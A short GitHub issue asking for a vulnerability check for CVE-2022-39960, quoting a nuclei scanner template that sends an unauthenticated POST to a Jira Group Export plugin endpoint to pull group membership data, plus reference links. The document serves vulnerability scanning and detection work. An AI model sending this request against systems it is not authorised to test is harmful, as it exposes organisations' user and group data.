### ISSUE TITLE
Create check for CVE-2022-39960

### ISSUE THREAD

**Issue by carnal0wnage** [carnal0wnage/J-PWN#24]
https://github.com/projectdiscovery/nuclei-templates/blob/54d78a0552a78cccafa3435bbdd42dff4b568c27/http/cves/2022/CVE-2022-39960.yaml#L4

```
http:
  - raw:
      - |
        POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groupexport_searchstring=&groupexport_download=true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"jiraGroupObjects"'
          - '"groupName"'
        condition: and

      - type: word
        part: header
        words:
          - "attachment"
          - "jira-group-export"
        condition: and

      - type: status
        status:
          - 200
```

  reference:
    - https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e
    - https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history
    - https://nvd.nist.gov/vuln/detail/CVE-2022-39960
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
